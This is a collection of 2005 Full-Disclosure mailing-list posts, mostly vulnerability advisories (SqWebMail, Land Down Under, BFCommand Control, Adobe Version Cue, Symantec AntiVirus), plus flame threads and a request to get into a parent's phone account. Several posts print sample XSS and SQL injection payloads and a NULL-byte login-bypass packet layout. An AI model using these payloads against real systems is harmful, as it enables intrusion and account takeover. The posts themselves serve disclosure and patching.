[Full-Disclosure] Chung's Donut Shop Release: Hacking Sprint PCS Vision
Hi my mom has a sprint pcs phone.Its a sanyo 8300.and i cant feger out thepass word .cause when u go to sprint pcs .com u put in ur phone number than ur pass word and i dont no it.and i was woundreing if u can help me please___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: SqWebMail HTML Emails Script Insertion Vulnerability
== Secunia Research 29/08/2005 - SqWebMail HTML Emails Script Insertion Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software SqWebMail 5.0.4 Other versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: Script Insertion Where: From Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in SqWebMail, which can be exploited by malicious people to conduct script insertion attacks. The vulnerability is caused due to SqWebMail failing to properly sanitise HTML emails. This can be exploited to include arbitrary script code in HTML emails, which will be executed in context of the SqWebMail server, as soon as the user views a received email. Example: img src=cid: onError=alert(document.domain); Successful exploitation allows execution of arbitrary script code and makes it possible for a malicious person to perform the same actions as the user of the webmail account (e.g. sending or viewing emails). == 4) Solution The vendor has issued an updated version of SqWebMail, which fixes this vulnerability. http://www.courier-mta.org/?download.php == 5) Time Table 26/08/2005 - Initial vendor notification. 26/08/2005 - Vendor confirms vulnerability and releases a fix. 29/08/2005 - Public disclosure. == 6) Credits Discovered by Jakob Balle, Secunia Research. == 7) References No references available. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2005-39/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] RE: Example firewall script
I look for bad rules set to learn a little more. I thought that my question was interesting because here there are many people who knows about this. Can you recommend me any web or any book? Thanks -Mensaje original- De: James Tucker [mailto:[EMAIL PROTECTED] Enviado el: sábado, 27 de agosto de 2005 18:17 Para: Full Disclosure Asunto: Re: [Full-disclosure] RE: Example firewall script Screw these arguments. What you should really do is get a security consultant to teach you the basics, and provide you with some exposure to the various different options you may have available, and in the case of your request, offer you some of the old horror stories. If your only aim is to learn, the I would suggest starting with your firewalls documentation. Most firewall developers do have at least a reasonable knowledge of firewall security and rule building. Moreover good documentation will leave references to good physical sources (books, courses, etc.). Getting back to the original question of BAD configurations :) (yep, my ATD is higher today) you may find some reasonable examples in high quality documentation too. You might try looking into any detailed hacking stories and statistics you can find, as these may lead to some other interesting conclusions about firewalls and their impacts on security too. Also, forums might be a good place to pick up bad firewall rules, you know those places are filled with crap because people just can't resist trying to show up the next guy and pretend to be the best. Just out of interest, why are you looking for Bad rule sets? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Really ODD 12 byte UDP attempts
On Sun, 28 Aug 2005 23:44:25 -0400 Michael Hale [EMAIL PROTECTED] wrote: I agree - Unix style traceroute probably responsible. See: http://www.tech-faq.com/unix-windows-traceroute.shtml On 8/28/05, Blue Boar [EMAIL PROTECTED] wrote: James Lay wrote: Aug 28 06:57:01 kernel: New,invalid SRC=64.94.45.26 DST=24.116.255.102 LEN=32 PROTO=UDP SPT=11050 DPT=33440 LEN=12 Most likely someone is just tracerouting to your IP. Grab the actual packets, and check the TTLs to be sure. BB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Ya...this is what it was alrightevery swinging one has a TTL of 1 or 2. Nice to know that there are so many out there tracerouting me :D Thanks for the quick and easy answer. James ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 788-1] New kismet packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 788-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze August 29th, 2005 http://www.debian.org/security/faq - -- Package: kismet Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CAN-2005-2626 CAN-2005-2627 CERT advisory : BugTraq ID : Debian Bug : Several security related problems have been discovered in kismet, a wireless 802.11b monitoring tool. The Common Vulnerabilities and Exposures project identifies the following problems: CAN-2005-2626 Insecure handling of unprintable characters in the SSID. CAN-2005-2627 Multiple integer underflows could allow remote attackers to execute arbitrary code. The old stable distribution (woody) does not seem to be affected by these problems. For the stable distribution (sarge) these problems have been fixed in version 2005.04.R1-1sarge1. For the unstable distribution (sid) these problems have been fixed in version 2005.08.R1-1. We recommend that you upgrade your kismet package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1.dsc Size/MD5 checksum: 750 b039fbc7c35524de1e3ee5a78fc26845 http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1.diff.gz Size/MD5 checksum:18229 64791928e4563a03c5ce41b2a2efaa28 http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1.orig.tar.gz Size/MD5 checksum: 871165 19b4f192eb11a418ed3f6bf65c1226af Alpha architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_alpha.deb Size/MD5 checksum: 1119340 00dc0b87b4e280d9a7c22b8af12e0b30 ARM architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_arm.deb Size/MD5 checksum: 1354622 366060825aa1d9822d54310a077cb74c Intel IA-32 architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_i386.deb Size/MD5 checksum: 1001996 a68fe42f46f7735509cb55958ca00e66 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_ia64.deb Size/MD5 checksum: 1322268 7e158f503477a2e927bbdc1c212243d7 HP Precision architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_hppa.deb Size/MD5 checksum: 1281696 b5095500d48a585767a897cabd72effe Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_m68k.deb Size/MD5 checksum: 1007112 0e2c231886863462c34266b76a81657c Big endian MIPS architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_mips.deb Size/MD5 checksum: 1103250 0e676e3951364ffca2bdd8f8acd0db60 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_mipsel.deb Size/MD5 checksum: 1105478 a9b44f41ad006d63e78e4cf38f297c50 PowerPC architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_powerpc.deb Size/MD5 checksum: 1031418 545d85659d58d06d7bc2985930292707 IBM S/390 architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_s390.deb Size/MD5 checksum: 940068 f5a71ce7d72cac6760d8f2409de372e4 Sun Sparc architecture: http://security.debian.org/pool/updates/main/k/kismet/kismet_2005.04.R1-1sarge1_sparc.deb Size/MD5 checksum: 975226 8b7d8f3966607221751cbb0d782152a8 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux)
Re: [Full-disclosure] Re: JA
I don't know about y'all, but if I was admin of a public ISP (or whatever), I wouldn't want to give anyone the idea that I'm smarter than everyone on the list that's just begging to be hacked/defaced/owned/etc exibar - Original Message - From: Bardus Populus [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Monday, August 29, 2005 1:02 AM Subject: [Full-disclosure] Re: JA [EMAIL PROTECTED], please follow your own rules. Missouri FreeNet staff and users are both held to the same general rules of conduct, as only a uniform policy of openness and respect can be reasonably expected to further MFN's goal of universal education. -bp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Example firewall script (iptables)
Maybe you'd get more informative and less 'get a clue!' answers if you rephrased and explained your question a little. For one, what in the world is a firewall script? I'd guess it's firewall rules you're talking about. Second, in what scenario? Corporate firewall, SME, personal, school? Without knowing that the only answers you can get is that 'pass all' is bad, so is 'block all'. // hdw Bernardo Martín wrote: Anybody have more information about bad example firewall script?? -Mensaje original- De: Bernardo Martín [mailto:[EMAIL PROTECTED] Enviado el: lunes, 29 de agosto de 2005 14:01 Para: Full Disclosure Asunto: RE: [Full-disclosure] RE: Example firewall script I look for bad rules set to learn a little more. I thought that my question was interesting because here there are many people who knows about this. Can you recommend me any web or any book? Thanks -Mensaje original- De: James Tucker [mailto:[EMAIL PROTECTED] Enviado el: sábado, 27 de agosto de 2005 18:17 Para: Full Disclosure Asunto: Re: [Full-disclosure] RE: Example firewall script Screw these arguments. What you should really do is get a security consultant to teach you the basics, and provide you with some exposure to the various different options you may have available, and in the case of your request, offer you some of the old horror stories. If your only aim is to learn, the I would suggest starting with your firewalls documentation. Most firewall developers do have at least a reasonable knowledge of firewall security and rule building. Moreover good documentation will leave references to good physical sources (books, courses, etc.). Getting back to the original question of BAD configurations :) (yep, my ATD is higher today) you may find some reasonable examples in high quality documentation too. You might try looking into any detailed hacking stories and statistics you can find, as these may lead to some other interesting conclusions about firewalls and their impacts on security too. Also, forums might be a good place to pick up bad firewall rules, you know those places are filled with crap because people just can't resist trying to show up the next guy and pretend to be the best. Just out of interest, why are you looking for Bad rule sets? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] J. A. Terranson
On Sun, 28 Aug 2005, ghost wrote: J.A.,. give up computers, go play in a sandbox. Did you just admit to threatening to mailbomb someone? lol. Bzzdt. This dude calls me up and starts asking if I'm going to. Out of the blue - like I said psycho central. My first response was to tell him to GFY and hang up. His persistence brought him his future. Look, Alif, Awww... Bonding. How cute. I like you, really I do. All your lame posts attacking people really adds to the list's security awareness, you really are elite. I mean, anyone who puts all their backups on a PUBLIC FTP SERVER can't be too bad of a guy, ya know? Those backups are a hodge podge of stuff from a variety of folks. I have always left that open (provided there is no warez stored). Feel free to join in. I know, I know, you're an *Admin*, you taught the FBI, eric is your toy, and you probably thought you closed it in time. Actually, most of it was moved around over the weekend, but it will be back shortly. Nothing to hide here. Does your wife know about your porn problem? Problem? Whats wrong with my taste in pr0n? You're almost as bad as that n3td3v idiot. Now *thats* fightin' words! (chuckles) In short, all i'm trying to say is, lets not play the one up game. Theres no one up game being played here. Theres some fucking freak who thinks he can call people on their fucking cell phones without picking up a case. It aint so. -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF I like the idea of belief in drug-prohibition as a religion in that it is a strongly held belief based on grossly insufficient evidence and bolstered by faith born of intuitions flowing from the very beliefs they are intended to support. don zweig, M.D. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities
TITLE: == Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities SEVERITY: = Medium SOFTWARE: == Land Down Under version 801 and prior Support Website : http://www.neocrome.net INFO: = Land Down Under is a multiple portal system which includes many different options like forum, statistic, site map, article menu and many more. The portal is powered by PHP and MySQL. BUG DESCRIPTION: === The portal system is vulnerable to various sql injection attacks, here are some examples: http://localhost/ldu/events.php?c=' http://localhost/ldu/events.php?f=incomingc=' http://localhost/ldu/events.php?c=%27 http://localhost/ldu/events.php?f=incomingc=%27 http://localhost/ldu/index.php?c=' http://localhost/ldu/index.php?c=%27 http://localhost/ldu/list.php?c='s=titlew=asco=1p=1 http://localhost/ldu/list.php?c=%27s=titlew=asco=1p=1 VENDOR STATUS: == The vendor was contacted using the contacts link on the main page. No response recieved till date. CREDITS: This vulnerability was discovered and researched by - matrix_killer of h4cky0u Security Forums. mail : matrix_k at abv.bg web : http://www.h4cky0u.org Greets to all omega-team members ORIGINAL: = http://h4cky0u.org/viewtopic.php?t=2371 -- http://www.h4cky0u.org (In)Security at its best... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] J. A. Terranson
I think the real issue here is that the rest of us really don't care. If you have a problem with someone, great. But telling us about it doesn't make you any more important in our eyes. In fact, everyone involved in this tit-for-tat is coming off looking very unprofessional. On 8/29/05, J.A. Terranson [EMAIL PROTECTED] wrote: On Sun, 28 Aug 2005, ghost wrote: J.A.,. give up computers, go play in a sandbox. Did you just admit to threatening to mailbomb someone? lol.Bzzdt.This dude calls me up and starts asking if I'm going to.Out ofthe blue - like I said psycho central.My first response was to tell himto GFY and hang up.His persistence brought him his future. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in BFCommand Control for Battlefield 1942 and Vietnam
### Luigi Auriemma Application: BFCommand Control Server Manager http://www.bfcommandcontrol.org Versions: BFCC = 1.22_A BFVCC = 2.14_B BFVCCDaemon is NOT vulnerable Platforms:Windows Bugs: A] full anonymous login bypass B] login bypass through NULL username C] invulnerable clients and full privileges D] server full after consecutive connections Exploitation: remote Date: 29 Aug 2005 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:http://aluigi.altervista.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === BFCommand Control Server Manager is a server manager available for the games Battlefield 1942 (with the name BFCC), Battlefield Vietnam (BFVCC) and Battlefield 2 (BF2CC). The difference between these server managers and the others available on Internet is that BFVCC is also directly included in the CD of Battlefield Vietnam so it's used on many servers. I have made a quick search on Internet and I have found that over the 20% of public Battlefield Vietnam servers uses one of the vulnerable versions of BFVCC on standard ports which, through these vulnerabilities, means full access to the management of these game servers and to other possible sensitive informations like the POP3 password of the admin. BFVCCDaemon is not vulnerable because it uses another protocol and in fact is considered a different program altogether. Then on Internet the amount of BFV servers which use BFVCCDaemon is almost unexistent. ### === 2) Bugs === -- A] full anonymous login bypass -- This bug can be explained with the following words: does not exist a login mechanism. In fact the login command is totally useless because anyone can connect to the server manager and take its control with full Super Admin privileges. The most interesting thing is that without logging into the server the attacker doesn't exist: the logs don't report his operations (except for a couple of commands if used) and for the server there are no people connected in that moment. Really a good way for controlling the server like a ghost and with the maximum relax and power. - B] login bypass through NULL username - The login command naturally is composed by an username and a password but the cool thing is that a NULL byte (0x00) in the username field will bypass the authentication and the server will grant the access to the attacker: login \x1e // command \0\x1e // username (NULL byte) none \x1e // password none \x1e // username \x1e // ??? // ??? \x00\x40\x40\x00 // command delimiter --- C] invulnerable clients and full privileges --- The admins (and moreover the local admin) have the ability of booting the other remote admins. The command Boot and any other command which has effect on the clients are totally useless since the server continues to keep the connection established and any operation or disconnection is made by the client not the server. In short a modified client (for example placing a NULL byte where is located the unicode command Boot in the executable) cannot be booted. Then each admin can be limited in what he can do or not by setting some permissions in the User Profiles section. Just like for the Boot command also the permissions are client-side so an admin with a very restricted power can take the full control of the server manager. D] server full after consecutive connections A sort of fake players attack with the difference that here after 20 consecutive connections (just a simple connect and disconnect) the server becomes full forever. In short if the client doesn't send the login command the server considers the connection in an idle state and when is reached the limit of 20 connections (although the connections and the sockets have been closed!) it becomes full and nobody can use the server manager from remote. Naturally also this attack is not showed in the logs. ### === 3) The Code === http://aluigi.altervista.org/poc/bfccown.zip ### == 4) Fix == No fix. No
Re: [Full-Disclosure] Chung's Donut Shop Release: Hacking Sprint PCS Vision
On Sun, 28 Aug 2005 21:25:18 PDT, ara rhea said: Hi my mom has a sprint pcs phone.Its a sanyo 8300.and i cant feger out the pass word .cause when u go to sprint pcs .com u put in ur phone number than ur pass word and i dont no it. and i was woundreing if u can help me please There's probably somebody on this list who can tell you what the password is. The more interesting question is what your mom is going to do if/when she finds out you hacked her phone. That's a really uncool scene, especially if you're still living at home - do you *really* want her referring to you as you ungrateful little twerp (or worse) until you're old enough to move out? pgp8ye5pe357g.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] J. A. Terranson
I agree. Please stop. Perhaps we could have a count of the 'ayes' to determine whether the list members wish to participate in the drama. I think the real issue here is that the rest of us really don't care. If you have a problem with someone, great. But telling us about it doesn't make you any more important in our eyes. In fact, everyone involved in this tit-for-tat is coming off looking very unprofessional. -- ___Sign-up for Ads Free at Mail.com http://www.mail.com/?sr=signup ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability
Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability iDEFENSE Security Advisory 08.29.05 www.idefense.com/application/poi/display?id=296type=vulnerabilities August 29, 2005 I. BACKGROUND Adobe Version Cue is a software version tracking system for Adobe products distributed with Adobe Creative Suite and select Adobe products. II. DESCRIPTION Local exploitation of a design error in Adobe Systems, Inc. Version Cue allows local attackers to gain root privileges. Version Cue includes a setuid root application named VCNative which contains a design error that allows local attackers to gain root privileges. The vulnerability specifically exists due to an unchecked command line option parameter. The -lib command line option allows users to specify library bundles which allows for the introduction of arbitrary code in the context of a root owned process. The init function in a shared library is executed immediately upon loading. By utilizing the -lib argument to load a malicious library, local attackers can execute arbitrary code with root privileges. III. ANALYSIS Successful exploitation allows local attackers to execute arbitrary code with root privileges. The attack method is trivial and requires no specialized exploit code or skill by the attacker. Simply compiling a shared library with malicious code is all that is required to gain control of the system. It should be noted that VCNative must connect to a valid host before loading libraries. The vulnerability is not exposed if VCNative has not been configured with a proper host value. In addition, the vulnerability affects only the Apple OS X platform and is only installed with Adobe Creative Suite or other Adobe products. IV. DETECTION iDEFENSE Labs has confirmed the existence of this vulnerability in Adobe Version Cue version 1 on the Apple OS X platform. V. WORKAROUND As a workaround solution, remove the setuid bit from the VCNative binary and execute the application as a root user when necessary. VI. VENDOR RESPONSE Adobe Version Cue Update 2 which addresses this vulnerability, is available for download at: http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985 The vendor advisory for this vulnerability is located at: http://www.adobe.com/support/techdocs/327129.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-1843 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/27/2005 Initial vendor notification 06/27/2005 Initial vendor response 08/29/2005 Public disclosure IX. CREDIT vade79 (http://fakehalo.us) is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDEFENSE Security Advisory 08.29.05: Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability
Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability iDEFENSE Security Advisory 08.29.05 www.idefense.com/application/poi/display?id=297type=vulnerabilities August 29, 2005 I. BACKGROUND Adobe Version Cue is a software version tracking system for Adobe products distributed with Adobe Creative Suite and select Adobe products. II. DESCRIPTION Local exploitation of a design error in Adobe Systems, Inc. Version Cue allows local attackers to gain root privileges. Version Cue includes a setuid root application named VCNative which is vulnerable to a symlink attack. The vulnerability specifically exists due to the use of predictable log file names. VCNative uses a format such as VCNative-[pid].log for the filename and stores the file in the current working directory. Attackers can easily predict the created filename and supply user-controlled data via the -host and - port options. A carefully supplied value can cause a crafted log file to be written. Crafted strings written to root-owned files can lead to arbitrary code execution with root privileges. III. ANALYSIS Successful exploitation allows local attackers to write to arbitrary files with user-supplied data. Data written to the linked file will include some corrupted data as well as user-suppplied data, potentially corrupting a file completely and preventing the execution of system commands. In addition, a carefully crafted input value can be used in conjunction with standard system tools such as cron to gain root privileges. A workaround solution has been provided for this vulnerability. In addition, the vulnerability affects only the Apple OS X platform and is only installed with Adobe Creative Suite or other Adobe products. IV. DETECTION iDEFENSE Labs has confirmed the existence of this vulnerability in Adobe Version Cue version 1 on the Apple OS X platform. V. WORKAROUND As a workaround solution, remove the setuid bit from the VCNative binary and execute the application as a root user when necessary. VI. VENDOR RESPONSE Adobe Version Cue Update 2 which addresses this vulnerability, is available for download at: http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985 The vendor advisory for this vulnerability is located at: http://www.adobe.com/support/techdocs/327129.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-1842 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/27/2005 Initial vendor notification 06/27/2005 Initial vendor response 08/29/2005 Public disclosure IX. CREDIT vade79 (http://fakehalo.us) is credited with this discovery. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDEFENSE Security Advisory 08.29.05: Symantec AntiVirus 9 Corporate Edition Local Privilege Escalation Vulnerability
Symantec AntiVirus 9 Corporate Edition Local Privilege Escalation Vulnerability iDEFENSE Security Advisory 08.29.05 www.idefense.com/application/poi/display?id=298type=vulnerabilities August 29, 2005 I. BACKGROUND Symantec AntiVirus 9 Corporate Edition is an enterprise quality Anti-Virus solution for the Windows platform. More information can be found at the following location: http://enterprisesecurity.symantec.com/products/products.cfm?ProductID=1 55 II. DESCRIPTION Local exploitation of a design error in the Symantec AntiVirus 9 Corporate Edition may allow a user to gain elevated privileges. Exploitation can occur when a user chooses the right click Scan for viruses option. The Symantec scan file interface allows the user to launch a help window through the use of a toolbar icon. If the user then right clicks the help window title bar they can choose the Jump to URL menu option, which will then allow them to browse the local file system and execute files as the SYSTEM user. This vulnerability is a re-appearance of an old bug formerly found in the Symantec 7.x series virus scan product. http://cert.uni-stuttgart.de/archive/bugtraq/2002/10/msg00357.html http://cert.uni-stuttgart.de/archive/bugtraq/2002/10/msg00379.html III. ANALYSIS Successful exploitation allows a local attacker to execute arbitrary commands as the System Administrator user. IV. DETECTION iDEFENSE has confirmed this vulnerability exists in version 9.0.1.1000 of Norton Antivirus Corporate Edition for Windows with all current updates applied. This is a re-appearance of an old bug that was reportedly fixed in versions 7.5.1 Build 62 and later, and version 7.6.1 Build 35a. V. WORKAROUND iDEFENSE is currently unaware of any workaround for this issue. VI. VENDOR RESPONSE Symantec engineers have verified this issue and corrected it in Maintenance Release (MR) 3 and all subsequent MRs and upgrades for Symantec AntiVirus Corporate Edition and Symantec Client Security. A vendor advisory for this issue is available at the following URL: http://www.symantec.com/avcenter/security/Content/2005.08.24.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-2017 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/15/2005 Initial vendor notification 06/15/2005 Initial vendor response 08/29/2005 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Chung's Donut Shop Release: Hacking Sprint PCS Vision
On 8/29/05,ara rhea [EMAIL PROTECTED] wrote: Hi my mom has a sprint pcs phone.Its a sanyo 8300.and i cant feger out the pass word .cause when u go to sprint pcs .com u put in ur phone number than ur pass word and i dont no it. and i was woundreing if u can help me please When |-|4X0ring your mum, your best bet is always going to be social engineering. Try this in your very best Eric Cartman voice: Mo-o-o-m! Can I have your cellphone password? It's really important! Hth, Surreal ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MDKSA-2005:155 - Updated apache2 packages fix integer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Update Advisory ___ Package name: apache2 Advisory ID:MDKSA-2005:155 Date: August 29th, 2005 Affected versions: 10.0, Corporate 3.0, Multi Network Firewall 2.0 __ Problem Description: Integer overflow in pcre_compile.c in Perl Compatible Regular Expressions (PCRE) before 6.2, as used in multiple products, allows attackers to execute arbitrary code via quantifier values in regular expressions, which leads to a heap-based buffer overflow. The apache2 packages, as shipped, were built using a private copy of pcre. The updated packages have been rebuilt against the system pcre libs to correct this problem. 10.1 and 10.2/LE2005 are already built against the system pcre. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2491 __ Updated Packages: Mandrakelinux 10.0: 943881ebaf9da5f51f8bccfbc515f641 10.0/RPMS/apache2-2.0.48-6.10.100mdk.i586.rpm 292468acb04a3760d3c075450f44348f 10.0/RPMS/apache2-common-2.0.48-6.10.100mdk.i586.rpm f8f5ebd3f2cb2bef58d5ff57e0ab2404 10.0/RPMS/apache2-devel-2.0.48-6.10.100mdk.i586.rpm b25bc3e1a57d0beea4723fa5219456f3 10.0/RPMS/apache2-manual-2.0.48-6.10.100mdk.i586.rpm 84177f9b193cc5e0468b409350abfbd9 10.0/RPMS/apache2-mod_cache-2.0.48-6.10.100mdk.i586.rpm c31198b85803695ac28f3922aeb9f511 10.0/RPMS/apache2-mod_dav-2.0.48-6.10.100mdk.i586.rpm c4091a8481f73214dffb467c36bc89d8 10.0/RPMS/apache2-mod_deflate-2.0.48-6.10.100mdk.i586.rpm 819ffb5454d55a4965eea4757baa5e3d 10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.10.100mdk.i586.rpm 498eed09c7a7fa948f90325e6b112d70 10.0/RPMS/apache2-mod_file_cache-2.0.48-6.10.100mdk.i586.rpm 2ac7af479cf53207a5453122dd359a06 10.0/RPMS/apache2-mod_ldap-2.0.48-6.10.100mdk.i586.rpm 6ed3ae29e63e28ec20937fcc9f900b32 